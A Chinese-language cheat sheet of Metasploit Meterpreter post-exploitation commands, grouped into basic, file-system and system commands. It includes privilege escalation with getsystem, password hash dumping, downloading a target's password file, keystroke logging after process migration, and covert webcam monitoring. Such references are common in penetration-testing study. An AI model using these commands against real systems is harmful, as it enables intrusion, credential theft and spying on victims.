0x01.基本命令

help# 檢視Meterpreter幫助
background#返回，把meterpreter後臺掛起
bgkill# 殺死一個背景 meterpreter 指令碼
bglist#提供所有正在執行的後臺指令碼的列表
bgrun#作為一個後臺執行緒執行指令碼
channel#顯示活動頻道
sessions -i number # 與會話進行互動，number表示第n個session,使用session -i 連線到指定序號的meterpreter會話已繼續利用
sesssions -k  number #與會話進行互動
close# 關閉通道
exit# 終止 meterpreter 會話
quit# 終止 meterpreter 會話
interact id #切換進一個通道
run#執行一個已有的模組，這裡要說的是輸入run後按兩下tab，會列出所有的已有的指令碼，常用的有autoroute,hashdump,arp_scanner,multi_meter_inject等
irb# 進入 Ruby 指令碼模式
read# 從通道讀取資料
write# 將資料寫入到一個通道
run和bgrun# 前臺和後臺執行以後它選定的 meterpreter 指令碼
use# 載入 meterpreter 的擴充套件
load/use#載入模組
Resource#執行一個已有的rc指令碼

0x02.檔案系統命令

getwd 或者pwd # 檢視當前工作目錄  
ls  #
cd
mkdir lltest2  #只能在當前目錄下建立資料夾
rmdir lltest2  #只能刪除當前目錄下資料夾
getlwd   或者 lpwd   #操作攻擊者主機 檢視當前目錄
lcd /tmp   #操作攻擊者主機 切換目錄
cat c:\\lltest\\lltestpasswd.txt  # 檢視檔案內容
upload /tmp/hack.txt C:\\lltest  # 上傳檔案到目標機上
download c:\\lltest\\lltestpasswd.txt /tmp/ # 下載檔案到本機上
edit c:\\1.txt #編輯或建立檔案  沒有的話，會新建檔案

0x03.系統命令

getsystem       #會自動利用各種各樣的系統漏洞來進行許可權提升
migrate          #程式id程式遷移
background     #把當前的會話設定為背景，需要的時候在啟用
getuid           #檢視對方正在執行的使用者
ps              #列出所有的程式
getpid          #返回執行meterpreter的id號
sysinfo         #產看系統資訊和體系結構
shell           #切換到cmd的系統許可權方式
exit           #退出shell會話返回meterpreter或終止meterpreter
getdesktop    擷取目標主機當前桌面會話視窗
run webcam -p /var/www    #在/var/www目錄監控目標主機的攝像頭
keylog_recorder   #使用migrate將會話遷移至explorer.exe的程式空間後記錄鍵盤

持續更新···